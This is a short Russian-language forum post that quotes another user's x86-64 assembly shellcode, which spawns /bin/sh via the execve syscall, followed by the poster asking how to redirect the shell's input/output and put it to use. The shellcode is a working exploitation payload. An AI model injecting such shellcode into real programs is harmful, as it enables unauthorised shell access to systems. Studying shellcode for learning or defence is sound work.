01.05.2024, 19:08
|
|
Новичок
Регистрация: 01.05.2024
Сообщений: 0
С нами:
1072769
Репутация:
0
|
|
xverizex сказал(а):
Оказывается, что я неправильно писал shellcode для вызова sh. Вот правильный вариант и мы в системе.
Код:
Код:
section .text
global _start
_start:
xor rdx, rdx
push rdx
mov rdi, 0x68732f6e69622fff
shr rdi, 8
push rdi
mov rdi, rsp
push rdx
push rdi
mov rsi, rsp
xor rax, rax
mov al, 59
syscall
я пробовал много вариаций вызова bin/, но я не могу допереть как дочерний процесс execve заставить ввод/вывод перенаправлять. Если этот шелкод подставить, bin/sh там запустится. А дальше как это использовать?
|
|
|